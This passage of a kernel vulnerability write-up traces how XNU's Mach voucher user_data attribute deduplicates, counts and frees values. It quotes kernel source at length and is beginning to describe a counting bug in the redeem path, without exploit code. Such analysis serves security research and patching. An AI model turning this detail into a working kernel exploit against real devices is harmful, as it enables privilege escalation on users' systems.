ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_recipe_command_t command,

mach_voucher_attr_value_handle_array_t prev_values,

mach_voucher_attr_value_handle_array_size_t prev_value_count,

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size,

mach_voucher_attr_value_handle_t *out_value,

mach_voucher_attr_value_flags_t *out_flags,

ipc_voucher_t *out_value_voucher)

{

user_data_element_t elem;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

/* never an out voucher */

*out_value_voucher = IPC_VOUCHER_NULL;

*out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

case MACH_VOUCHER_ATTR_USER_DATA_STORE:

if (USER_DATA_MAX_DATA < content_size) {

return KERN_RESOURCE_SHORTAGE;

}

/* empty is the default */

if (0 == content_size) {

*out_value = 0;

return KERN_SUCCESS;

}

elem = user_data_dedup(content, content_size);

*out_value = (mach_voucher_attr_value_handle_t)elem;

return KERN_SUCCESS;

default:

/* every other command is unknown */

return KERN_INVALID_ARGUMENT;

}

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

mach_voucher_attr_content_t content,

mach_voucher_attr_content_size_t content_size)

{

iv_index_t sum;

iv_index_t hash;

user_data_element_t elem;

user_data_element_t alloc = NULL;

sum = user_data_checksum(content, content_size);

hash = USER_DATA_HASH_BUCKET(sum);

retry:

user_data_lock();

queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

assert(elem->e_hash == hash);

/* if sums match... */

if (elem->e_sum == sum && elem->e_size == content_size) {

iv_index_t i;

/* and all data matches */

for (i = 0; i < content_size; i++) {

if (elem->e_data[i] != content[i]) {

break;

}

}

if (i < content_size) {

continue;

}

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

if (NULL != alloc) {

kfree(alloc, sizeof(*alloc) + content_size);

}

return elem;

}

}

if (NULL == alloc) {

user_data_unlock();

alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

alloc->e_made = 1;

alloc->e_size = content_size;

alloc->e_sum = sum;

alloc->e_hash = hash;

memcpy(alloc->e_data, content, content_size);

goto retry;

}

queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

user_data_unlock();

return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.
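The "drop the lock, allocate, retake the lock, look again" dance is a common pattern, and it's easier to see with the hashing stripped away. Here's a userspace sketch using a pthread mutex and malloc in place of the kernel primitives; it uses a single list instead of hash buckets, and toy_node, toy_lock and toy_dedup are hypothetical names.

```c
#include <assert.h>
#include <pthread.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct toy_node {
    struct toy_node *next;
    uint32_t made;
    uint32_t size;
    uint8_t  data[];
};

static pthread_mutex_t toy_lock = PTHREAD_MUTEX_INITIALIZER;
static struct toy_node *toy_list; /* single bucket, for brevity */

/* Find or create the unique node for content. Returns NULL on OOM. */
static struct toy_node *toy_dedup(const uint8_t *content, uint32_t size)
{
    struct toy_node *alloc = NULL;

    for (;;) {
        pthread_mutex_lock(&toy_lock);
        for (struct toy_node *n = toy_list; n != NULL; n = n->next) {
            if (n->size == size && memcmp(n->data, content, size) == 0) {
                n->made++;
                pthread_mutex_unlock(&toy_lock);
                free(alloc); /* another thread won the race, or NULL */
                return n;
            }
        }
        if (alloc != NULL) {
            /* Second pass, still no match: publish our node. */
            alloc->next = toy_list;
            toy_list = alloc;
            pthread_mutex_unlock(&toy_lock);
            return alloc;
        }
        /* First pass, no match: allocate with the lock dropped,
         * then go around again and rescan under the lock. */
        pthread_mutex_unlock(&toy_lock);
        alloc = malloc(sizeof(*alloc) + size);
        if (alloc == NULL) {
            return NULL;
        }
        alloc->made = 1;
        alloc->size = size;
        memcpy(alloc->data, content, size);
    }
}
```

The rescan is what keeps the structure unique: without it, two threads storing the same bytes at the same time could each insert their own node.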

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 2^32 increments...)
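The overflow remark is just unsigned 32-bit arithmetic, assuming (as "first dword" suggests) that the counter is a 32-bit unsigned integer. A tiny sketch, with toy_bump as a made-up name:

```c
#include <assert.h>
#include <stdint.h>

/* Increment an unchecked 32-bit counter; unsigned overflow wraps to 0. */
static uint32_t toy_bump(uint32_t made)
{
    return made + 1u;
}
```

So toy_bump(UINT32_MAX) yields 0: the one increment in 2^32 where the value goes down rather than up.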

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

/* TODO: value insertion from returned voucher */

if (IV_NULL != new_value_voucher) {

iv_release(new_value_voucher);

}

Next, the code needs to wrap new_value in an ivac_entry_s and determine the index of that entry in the controller's table of values. This is done by ivace_reference_by_value:

/*

* Find or create a slot in the table associated

* with this attribute value. The ivac reference

* is transferred to a new value, or consumed if

* we find a matching existing value.

*/

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

iv_set(voucher, key_index, val_index);

/*

* Look up the values for a given <key, index> pair.

* Consumes a reference on the passed voucher control.

* Either it is donated to a newly-created value cache

* or it is released (if we piggy back on an existing

* value cache entry).

*/

static iv_index_t

ivace_reference_by_value(

ipc_voucher_attr_control_t ivac,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_flags_t flag)

{

ivac_entry_t ivace = IVACE_NULL;

iv_index_t hash_index;

iv_index_t index;

if (IVAC_NULL == ivac) {

return IV_UNUSED_VALINDEX;

}

ivac_lock(ivac);

restart:

hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

index = ivac->ivac_table[hash_index].ivace_index;

while (index != IV_HASH_END) {

assert(index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[index];

assert(!ivace->ivace_free);

if (ivace->ivace_value == value) {

break;

}

assert(ivace->ivace_next != index);

index = ivace->ivace_next;

}

/* found it? */

if (index != IV_HASH_END) {

/* only add reference on non-persistent value */

if (!ivace->ivace_persist) {

ivace->ivace_refs++;

ivace->ivace_made++;

}

ivac_unlock(ivac);

ivac_release(ivac);

return index;

}

/* insert new entry in the table */

index = ivac->ivac_freelist;

if (IV_FREELIST_END == index) {

/* freelist empty */

ivac_grow_table(ivac);

goto restart;

}

/* take the entry off the freelist */

ivace = &ivac->ivac_table[index];

ivac->ivac_freelist = ivace->ivace_next;

/* initialize the new entry */

ivace->ivace_value = value;

ivace->ivace_refs = 1;

ivace->ivace_made = 1;

ivace->ivace_free = FALSE;

ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

/* insert the new entry in the proper hash chain */

ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

ivac->ivac_table[hash_index].ivace_index = index;

ivac_unlock(ivac);

/* donated passed in ivac reference to new entry */

return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found (and it isn't marked persistent) then both its ivace_refs and ivace_made counts are incremented:

ivace->ivace_refs++;

ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.
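The find-or-create pattern above can be modelled in user space. This is only a minimal sketch, not the kernel code: the names `struct entry`, `struct table`, `table_init` and `reference_by_value` are hypothetical, the table has a fixed size instead of growing, there is no locking, and the persistent flag is left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define TABLE_SIZE 8u          /* hypothetical fixed size; the real table can grow */
#define CHAIN_END  UINT32_MAX  /* stands in for IV_HASH_END and IV_FREELIST_END */

struct entry {
    uint64_t value;  /* like ivace_value */
    uint32_t refs;   /* like ivace_refs */
    uint32_t made;   /* like ivace_made */
    uint32_t next;   /* hash chain link, or freelist link while free */
    uint32_t head;   /* first entry of the chain for this bucket (like ivace_index) */
    bool     free;
};

struct table {
    struct entry e[TABLE_SIZE];
    uint32_t freelist;         /* index of the first free entry */
};

void table_init(struct table *t) {
    for (uint32_t i = 0; i < TABLE_SIZE; i++) {
        t->e[i] = (struct entry){ .next = i + 1, .head = CHAIN_END, .free = true };
    }
    t->e[TABLE_SIZE - 1].next = CHAIN_END;
    t->freelist = 0;
}

/* Returns the index holding value, or CHAIN_END if this model table is full. */
uint32_t reference_by_value(struct table *t, uint64_t value) {
    uint32_t bucket = (uint32_t)(value % TABLE_SIZE);

    /* walk the hash chain looking for a matching value */
    for (uint32_t i = t->e[bucket].head; i != CHAIN_END; i = t->e[i].next) {
        if (t->e[i].value == value) {
            t->e[i].refs++;
            t->e[i].made++;
            return i;
        }
    }

    /* no match: take an entry off the freelist */
    uint32_t index = t->freelist;
    if (index == CHAIN_END) {
        return CHAIN_END;      /* the real code grows the table and restarts */
    }
    struct entry *n = &t->e[index];
    t->freelist = n->next;

    n->value = value;
    n->refs = 1;
    n->made = 1;
    n->free = false;

    /* push the new entry onto the front of the bucket's chain */
    n->next = t->e[bucket].head;
    t->e[bucket].head = index;
    return index;
}
```

Looking up the same value twice yields the same index with both counters at 2, while a different value that hashes to the same bucket gets its own entry chained behind it.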

Back in the caller, the index returned by ivace_reference_by_value is then passed to iv_set, which stores it into the correct slot in the voucher's iv_table. This is just a simple array index operation:

iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

iv_index_t key_index,

iv_index_t value_index)

{

assert(key_index < iv->iv_table_size);

iv->iv_table[key_index] = value_index;

}
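As a small illustration of how a key ends up selecting a slot, here is a user-space sketch. The names are hypothetical, the table size is arbitrary, and the value 7 for MACH_VOUCHER_ATTR_KEY_USER_DATA is an assumption (it is consistent with a key index of 6 for user_data).

```c
#include <assert.h>
#include <stdint.h>

#define KEY_USER_DATA   7u   /* assumed value of MACH_VOUCHER_ATTR_KEY_USER_DATA */
#define MODEL_KEY_COUNT 8u   /* hypothetical number of slots in this model */

struct model_voucher {
    uint32_t table_size;
    uint32_t table[MODEL_KEY_COUNT];  /* one value index per key index */
};

/* The key index is one less than the key. */
uint32_t model_key_to_index(uint32_t key) {
    assert(key >= 1);
    return key - 1;
}

uint32_t model_index_to_key(uint32_t key_index) {
    return key_index + 1;
}

/* Same shape as iv_set: a bounds check followed by an array store. */
void model_iv_set(struct model_voucher *iv, uint32_t key_index, uint32_t value_index) {
    assert(key_index < iv->table_size);
    iv->table[key_index] = value_index;
}
```

Storing value index 42 for the user_data key writes slot 6 of the table; nothing else in the voucher records which attribute manager that index belongs to, which is why the slot position matters.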

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.
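Since the iv_dedup code isn't reproduced here, the following is a rough user-space sketch of the behaviour just described. It is an assumption-laden model: `struct mini_voucher`, `struct mini_registry` and `mini_dedup` are hypothetical names, a linear list stands in for the ivht_bucket hash table, there is no locking, and the release of the duplicate's value references is ignored.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MINI_KEYS         8u   /* hypothetical table size */
#define MINI_MAX_VOUCHERS 16u  /* hypothetical registry capacity */

struct mini_voucher {
    uint32_t refs;
    uint32_t table[MINI_KEYS];            /* value indexes, one per key index */
};

struct mini_registry {
    struct mini_voucher *known[MINI_MAX_VOUCHERS];
    size_t count;
};

/*
 * Return the canonical voucher for new_iv's set of value indexes.
 * On a match the existing voucher gains a reference and new_iv loses
 * one (the real code calls iv_dealloc(new_iv, FALSE) at this point).
 * Otherwise new_iv is published, and only now becomes visible to
 * later dedup passes. Returns NULL if the model registry is full.
 */
struct mini_voucher *mini_dedup(struct mini_registry *r, struct mini_voucher *new_iv) {
    for (size_t i = 0; i < r->count; i++) {
        struct mini_voucher *iv = r->known[i];
        if (memcmp(iv->table, new_iv->table, sizeof(iv->table)) == 0) {
            iv->refs++;
            new_iv->refs--;
            return iv;
        }
    }
    if (r->count == MINI_MAX_VOUCHERS) {
        return NULL;
    }
    r->known[r->count++] = new_iv;
    return new_iv;
}
```

Two vouchers built from the same recipe collapse into the first one, and the second is left with zero references because it was never published.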

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

ip_kobject = reference-counted pointer to the voucher

}

voucher {

iv_refs = 1;

iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

ivac_table[index] =

{

ivace_refs = 1;

ivace_made = 1;

ivace_value = pointer to user_data_value_element

}

}

user_data_value_element {

e_made = 1;

e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

for (i = 0; i < iv->iv_table_size; i++) {

ivace_release(i, iv->iv_table[i]);

}

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

iv_index_t key_index,

iv_index_t value_index)

{

...

ivgt_lookup(key_index, FALSE, &ivam, &ivac);

ivac_lock(ivac);

assert(value_index < ivac->ivac_table_size);

ivace = &ivac->ivac_table[value_index];

assert(0 < ivace->ivace_refs);

/* cant release persistent values */

if (ivace->ivace_persist) {

ivac_unlock(ivac);

return;

}

if (0 < --ivace->ivace_refs) {

ivac_unlock(ivac);

return;

}

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock, then calculate a pointer into the ivac's ivac_table to get the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

key = iv_index_to_key(key_index);

assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

/*

 * if last return reply is still pending,

 * let it handle this later return when

 * the previous reply comes in.

 */

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

/* claim releasing */

ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

value = ivace->ivace_value;

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

/*

 * new made values raced with this return. If the

 * manager OK'ed the prior release, we have to start

 * the made numbering over again (pretend the race

 * didn't happen). If the entry has zero refs again,

 * re-drive the release.

 */

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute manager's release_value callback is called:

kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

ipc_voucher_attr_manager_t __assert_only manager,

mach_voucher_attr_key_t __assert_only key,

mach_voucher_attr_value_handle_t value,

mach_voucher_attr_value_reference_t sync)

{

user_data_element_t elem;

iv_index_t hash;

assert(&user_data_manager == manager);

USER_DATA_ASSERT_KEY(key);

elem = (user_data_element_t)value;

hash = elem->e_hash;

user_data_lock();

if (sync == elem->e_made) {

queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

user_data_unlock();

kfree(elem, sizeof(*elem) + elem->e_size);

return KERN_SUCCESS;

}

assert(sync < elem->e_made);

user_data_unlock();

return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.
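Stripped of the hash table and locking, that contract is tiny. A minimal user-space sketch, with hypothetical names (`struct model_elem`, `model_release_value`) and a boolean flag standing in for the queue_remove plus kfree:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct model_elem {
    uint32_t e_made;  /* bumped each time the element is handed out */
    bool     freed;   /* stands in for the hash removal plus kfree */
};

/* Returns true (like KERN_SUCCESS) only if sync matches e_made exactly. */
bool model_release_value(struct model_elem *elem, uint32_t sync) {
    if (sync == elem->e_made) {
        elem->freed = true;
        return true;
    }
    /* the caller's count may lag behind e_made, but should never lead it */
    assert(sync < elem->e_made);
    return false;     /* like KERN_FAILURE: the element stays alive */
}
```

With e_made at 2, a release with sync equal to 1 is refused and the element survives; a release with sync equal to 2 frees it.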

Having looked at the semantics of user_data_release_value let's look back at the callsite:

redrive:

assert(value == ivace->ivace_value);

assert(!ivace->ivace_free);

made = ivace->ivace_made;

ivac_unlock(ivac);

/* callout to manager's release_value */

kr = (ivam->ivam_release_value)(ivam, key, value, made);

/* recalculate entry address as table may have changed */

ivac_lock(ivac);

ivace = &ivac->ivac_table[value_index];

assert(value == ivace->ivace_value);

/*

 * new made values raced with this return. If the

 * manager OK'ed the prior release, we have to start

 * the made numbering over again (pretend the race

 * didn't happen). If the entry has zero refs again,

 * re-drive the release.

 */

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that), while ivace_reference_by_value, which increments ivace->ivace_made, does so under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element, then we'll encounter one of the more complex situations outlined above where, in ivace_release, ivace_made is not equal to the user_data_value_element's e_made field. That case gets special treatment because it indicates that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

if (0 == ivace->ivace_refs) {

goto redrive;

}

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

} else {

/*

 * If the manager returned FAILURE, someone took a

 * reference on the value but have not updated the ivace,

 * release the lock and return since thread who got

 * the new reference will update the ivace and will have

 * non-zero reference on the value.

 */

if (KERN_SUCCESS != kr) {

ivace->ivace_releasing = FALSE;

ivac_unlock(ivac);

return;

}

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is nevertheless semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

if (ivace->ivace_made != made) {

if (KERN_SUCCESS == kr) {

ivace->ivace_made -= made;

}

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

if (ivace->ivace_releasing) {

ivac_unlock(ivac);

return;

}

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

if (0 == ivace->ivace_refs) {

goto redrive;

}

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken are nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

/*

 * If the manager returned FAILURE, someone took a

 * reference on the value but have not updated the ivace,

 * release the lock and return since thread who got

 * the new reference will update the ivace and will have

 * non-zero reference on the value.

 */

In this case, the code again just sets ivace_releasing to FALSE, drops the ivac lock and returns.

Put another way, this comment is explaining exactly what happens when the racing thread was in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.
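All of the cases walked through in this section can be summarised as one decision function. This is a sketch for illustration only: `enum outcome`, `struct model_ivace` and `after_callout` are hypothetical names, and the last outcome (nothing raced, so the entry is retired to the freelist) is an assumption about code that isn't shown in the snippets above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum outcome {
    OUTCOME_REDRIVE,      /* refs hit zero again: call release_value again */
    OUTCOME_STILL_ALIVE,  /* entry was revived and still has references */
    OUTCOME_IN_WINDOW,    /* manager refused: another thread is in WINDOW */
    OUTCOME_FREE_ENTRY    /* nothing raced (assumed: entry goes to the freelist) */
};

struct model_ivace {
    uint32_t refs;       /* like ivace_refs */
    uint32_t made;       /* like ivace_made */
    bool     releasing;  /* like ivace_releasing */
};

/*
 * made is the ivace_made snapshot taken before the ivac lock was dropped;
 * released_ok says whether release_value returned KERN_SUCCESS.
 */
enum outcome after_callout(struct model_ivace *ivace, uint32_t made, bool released_ok) {
    if (ivace->made != made) {
        if (released_ok) {
            ivace->made -= made;     /* start the made numbering over */
        }
        if (ivace->refs == 0) {
            return OUTCOME_REDRIVE;  /* releasing stays set for the retry */
        }
        ivace->releasing = false;
        return OUTCOME_STILL_ALIVE;
    }
    if (!released_ok) {
        ivace->releasing = false;
        return OUTCOME_IN_WINDOW;
    }
    return OUTCOME_FREE_ENTRY;
}
```

Written this way it is easier to see that only the OUTCOME_IN_WINDOW path depends on the attribute manager's own counter (e_made for user_data); every other path is decided by the ivace's fields alone.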

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

/* ... we found a match... */

elem->e_made++;

user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

switch (command) {

case MACH_VOUCHER_ATTR_REDEEM:

/* redeem of previous values is the value */

if (0 < prev_value_count) {

elem = (user_data_element_t)prev_values[0];

assert(0 < elem->e_made);

elem->e_made++;

*out_value = prev_values[0];

return KERN_SUCCESS;

}

/* redeem of default is default */

*out_value = 0;

return KERN_SUCCESS;

